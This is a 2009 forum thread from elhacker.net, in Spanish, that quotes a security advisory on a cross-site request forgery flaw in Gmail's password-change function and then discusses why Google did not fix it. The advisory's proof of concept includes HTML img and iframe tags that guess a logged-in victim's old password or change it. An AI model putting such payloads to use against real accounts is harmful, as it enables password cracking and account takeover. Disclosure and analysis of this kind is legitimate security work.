elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  gmail CSRF
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: gmail CSRF  (Leído 6,004 veces)
Azielito
no es
Colaborador
***
Desconectado Desconectado

Mensajes: 9.188


>.<


Ver Perfil WWW
gmail CSRF
« en: 4 Marzo 2009, 16:20 pm »

Solo para mantenernos informados :xD





Cita de: seclists.org/fulldisclosure/2009/Mar/0029.html
From: ISecAuditors Security Advisories <advisories_at_isecauditors.com>
Date: Tue, 03 Mar 2009 11:55:50 +0100

=============================================
INTERNET SECURITY AUDITORS ALERT 2007-003
- Original release date: August 1st, 2007
- Last revised: January 11th, 2009
- Discovered by: Vicente Aguilera Diaz
- Severity: 3/5
=============================================

I. VULNERABILITY
-------------------------
CSRF vulnerability in GMail service

II. BACKGROUND
-------------------------
Gmail is Google's free webmail service. It comes with built-in Google
search technology and over 2,600 megabytes of storage (and growing
every day). You can keep all your important messages, files and
pictures forever, use search to quickly and easily find anything
you're looking for, and make sense of it all with a new way of viewing
messages as part of conversations.

III. DESCRIPTION
-------------------------
Cross-Site Request Forgery, also known as one click attack or session
riding and abbreviated as CSRF (Sea-Surf) or XSRF, is a kind of
malicious exploit of websites. Although this type of attack has
similarities to cross-site scripting (XSS), cross-site scripting
requires the attacker to inject unauthorized code into a website,
while cross-site request forgery merely transmits unauthorized
commands from a user the website trusts.

GMail is vulnerable to CSRF attacks in the "Change Password"
functionality. The only token for authenticate the user is a session
cookie, and this cookie is sent automatically by the browser in every
request.

An attacker can create a page that includes requests to the "Change
password" functionality of GMail and modify the passwords of the users
who, being authenticated, visit the page of the attacker.

The attack is facilitated since the "Change Password" request can be
realized across the HTTP GET method instead of the POST method that is
realized habitually across the "Change Password" form.

IV. PROOF OF CONCEPT
-------------------------
1. An attacker create a web page "csrf-attack.html" that realize many
HTTP GET requests to the "Change Password" functionality.

For example, a password cracking of 3 attempts (see "OldPasswd"
parameter):
...
<img
src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
<img
src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD2&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
<img
src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD3&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
...

or with hidden frames:
...
<iframe
src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
<iframe
src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
<iframe
src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
...

The attacker can use deliberately a weak new password (see "Passwd"
and "PasswdAgain" parameters), this way he can know if the analysed
password is correct without need to modify the password of the victim
user.

Using weak passwords the "Change Password" response is:
 - " The password you gave is incorrect. ", if the analysed password
is not correct.
 - " We're sorry, but you've selected an insecure password. In order
to protect the security of your account, please click "Password
Strength" to get tips on choosing to safer password. ", if the
analysed password is correct and the victim password is not modified.

If the attacker want to modify the password of the victim user, the
waited response message is: " Your new password has been saved - OK ".

In any case, the attacker evades the restrictions imposed by the
captcha of the authentication form.

2. A user authenticated in GMail visit the "csrf-attack.html" page
controlled by the attacker.

For example, the attacker sends a mail to the victim (a GMail account)
and provokes that the victim visits his page (social engineering). So,
the attacker insures himself that the victim is authenticated.

3. The password cracking is executed transparently to the victim.

V. BUSINESS IMPACT
-------------------------
- Selective DoS on users of the GMail service (changing user password).
- Possible access to the mail of other GMail users.

VI. SYSTEMS AFFECTED
-------------------------
Gmail service.

VII. SOLUTION
-------------------------
No solution provided by vendor.

VIII. REFERENCES
-------------------------
http://www.gmail.com

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by
Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
July 31, 2007: Initial release
August 1, 2007: Fewer corrections.
December 30, 2008: Last details.

XI. DISCLOSURE TIMELINE
-------------------------
July 30, 2007: Vulnerability acquired by
                    Internet Security Auditors.
August 1, 2007: Initial notification sent to the
                    Google security team.
August 1, 2007: Google security team request additional
                    information.
                    about and start review the vulnerability.
August 13, 2007: Request information about the status.
August 15, 2007: Google security team responds that they are still
                    working on this.
September 19, 2007: Request for the status. No response.
November 26, 2007: Request for the status. No response.
January 2, 2008: Request for the status. No response.
January 4, 2008: Request for the status. No response.
January 11, 2008: Request for the status. No response.
January 15, 2008: Request for the status. Automated response.
January 18, 2008: Google security team informs that don't expect
                    behaviour to change in the short term giving
                    the justification.
                    We deconstruct those arguments as insufficient.
                    No more responses.
December 30, 2008: Request for the status. Confirmation from Google
                    they won't change the consideration about this.
January 11, 2009: Publication to Bugtraq. Rejected twice.
                    No reasons.
March 03, 2009: General publication for disclosure in other lists.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.
En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: gmail CSRF
« Respuesta #1 en: 4 Marzo 2009, 17:02 pm »

También la noticia esta mañana  :D

http://foro.elhacker.net/noticias/google_ignora_vulnerabilidad_de_seguridad_en_gmail_descubierta_por_un_espanol-t247296.0.html
Lo que no entiendo es como puede ser que el fallo sea de 2007 y aún no haya sido parchado  :¬¬

Saludos
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.605


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: gmail CSRF
« Respuesta #2 en: 4 Marzo 2009, 22:05 pm »

http://packetstormsecurity.org/0903-exploits/gmail-xsrf.txt

Porque si la falla no aparece en milw0rm, packet storm, securityfocus, etc entonces no se parcha a menos que lo reportes directamente pero olvidate de que alguien de Google se va a dar el tiempo de buscar vulnerabilidades o de visitar sitios donde puedan dar algún indicio de estas fallas, en otras palabras puedes publicar un agujero de paypal en este foro y mientras no sea publicado en sitios de advisories conocidos entonces nunca lo sabrán (no significa que esté permitido hacerlo :P).
En línea

sirdarckcat
Aspirante a supervillano
Moderador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: gmail CSRF
« Respuesta #3 en: 4 Marzo 2009, 22:19 pm »

WHK, Una vulnerabilidad en un sitio web que publicaste en este foro hace tiempo hizo que los propietaros de ese sitio contactaran al ISP (sagonet) y mandaran una orden de quitar ese contenido.
En línea

HardieVon

Desconectado Desconectado

Mensajes: 181


Programming HardCore


Ver Perfil WWW
Re: gmail CSRF
« Respuesta #4 en: 6 Marzo 2009, 05:07 am »

ps yo creo que no lo an parchado por que no importa...no afecta en nada..

 ;D
En línea

berz3k
Colaborador
***
Desconectado Desconectado

Mensajes: 1.212



Ver Perfil
Re: gmail CSRF
« Respuesta #5 en: 24 Marzo 2009, 23:40 pm »

Interesante la news, no entiendo por que gmail se hace "wey" , sdc sabras por que fue ignorado esto ?

-berz3k.
En línea

sirdarckcat
Aspirante a supervillano
Moderador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: gmail CSRF
« Respuesta #6 en: 25 Marzo 2009, 13:54 pm »

Porque el ataque solo funcionaria para ataques con una victima en especifico, pero en ese caso es mas facil simplemente ver si tu victima usa un password debil. En cuyo caso es culpa de la victima por tener un password chafa, y gmail no podria hacer nada al respecto de todas formas..
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Anti-CSRF Filter Bypass SMF 2.0 / 1.1.14
Nivel Web
Preth00nker 0 3,370 Último mensaje 25 Agosto 2011, 21:31 pm
por Preth00nker
[Perl] CSRF T00l
Scripting
BigBear 0 1,882 Último mensaje 7 Octubre 2011, 01:16 am
por BigBear
CSRF
Hacking
fokin 1 2,816 Último mensaje 22 Abril 2014, 16:29 pm
por dantemc
Facebook CSRF - RECONNECT
Bugs y Exploits
el-brujo 0 3,027 Último mensaje 12 Marzo 2015, 18:26 pm
por el-brujo
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines